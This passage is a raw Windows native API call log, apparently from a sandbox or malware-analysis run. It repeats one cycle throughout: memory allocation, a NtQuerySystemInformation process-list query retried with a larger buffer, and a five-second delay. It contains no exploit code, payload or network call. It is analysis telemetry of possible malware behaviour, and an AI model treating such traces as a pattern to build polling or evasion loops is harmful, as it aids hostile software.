NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.439] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.454] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.471] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.486] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.501] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.516] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.545] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.564] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.579] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.597] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.610] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.627] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.641] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.656] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.673] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.689] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.704] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.719] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.735] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.750] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.765] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.782] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, 